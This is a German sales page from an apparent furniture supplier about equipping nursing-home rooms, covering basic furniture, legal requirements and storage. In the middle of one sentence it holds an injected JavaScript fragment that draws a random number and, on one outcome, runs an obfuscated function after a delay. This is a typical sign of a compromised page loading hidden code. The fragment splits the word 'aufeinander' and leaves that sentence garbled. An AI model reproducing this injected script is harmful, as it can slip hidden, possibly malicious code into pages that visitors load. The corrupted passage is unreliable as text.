Sie sind hier:

Heimeinrichtung


HeimeinrichtungDie Einrichtung eines Pflegeheims leicht gemacht

Wenn man ein Pflegeheim eröffnet, benötigt man einen Partner, der einem bei der Heimeinrichtung zur Seite steht. Allein das Heimgesetz enthält viele Bestimmungen und Richtlinien zur Heimeinrichtung. Schnell hat man da etwas falsch gemacht. Deshalb benötigt man einen Partner, der sich in dieser Materie auskennt. Wir können Ihnen sehr gut helfen.

Die Grundausstattung eines Heimzimmers

Klassischerweise hat ein Zimmer eines Pflegeheims eine bestimmte Grundausstattung. Hierzu gehören meist ein Schrank, ein Bett, ein Tisch und 2-3 Stühle. Dieses Grundmobiliar sollte ein paar Bedingungen erfüllen. Es sollte stabil und massiv sein sowie farblich aufeinandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander abgestimmt sein. Zudem sollte es für den zukünftigen Heimbewohner keine Gefahrenquelle darstellen. Bei der Planung der Heimeinrichtung sollte man außerdem vorher wissen, ob die zukünftigen Bewohner selbst Möbel mitbringen dürfen. Meist hängen Rentner an ihren alten Möbelstücken, doch in die immer moderner werdende Heimeinrichtung passt ein altes Möbelstück nicht herein. Deshalb sollten die Möbel zeitlos gestaltet sein, damit sich jede Art von mitgebrachten Möbeln in das Zimmer einfügen kann.

Genügend Stauraum

Viele Zimmer von Pflegeheimen sind sehr klein und haben wenig Stauraum. Deshalb sollten Möbel in Pflegezimmern nicht nur gut aussehen, sondern auch praktisch sein. Große Fächer und viel Stauraum sind dabei nur ein Kriterium für eine passende Heimeinrichtung. Diese Möbel sind oft alles was die Rentner noch haben und sie müssen alle ihre Habseligkeiten in den Heimmöbeln unterbringen. Es gibt viel zu beachten bei der Heimeinrichtung. Gut, dass Sie mit uns einen kompetenten Partner für Ihr Heim gefunden haben.